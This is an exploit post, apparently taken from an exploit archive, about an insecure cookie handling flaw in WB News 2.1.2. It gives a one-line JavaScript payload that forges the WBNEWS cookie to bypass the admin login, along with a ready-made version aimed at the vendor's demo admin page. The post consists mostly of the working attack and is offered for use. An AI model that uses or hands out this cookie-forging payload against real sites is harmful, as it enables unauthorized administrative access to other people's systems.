id: 5073
date: 04/19/2009
title: WB News 2.1.2 Insecure Cookie Handling Vulnerability
author: ThE g0bL!N
cves: 

====================================================
WB News 2.1.2 Insecure Cookie Handling Vulnerability
====================================================



 [~]Download: http://www.webmobo.com/downloads/
  
 [~]Software: wb news 2.1.2
 [~]author: ThE g0bL!N

[~] ------------------------------------------------------------------------------
  
wb news 2.1.2 Insecure Cookie Handling Vulnerability
---------------------------------------
exploit:
-------
javascript:document.cookie="WBNEWS=[id];path=/";
demo
----
http://demo.webmobo.com/news/admin/
exploit for demo
----------------
javascript:document.cookie="WBNEWS=1;path=/";
 
[~]--------------------------------------------------------------------------------
 



#  0day.today [2023-03-22]  #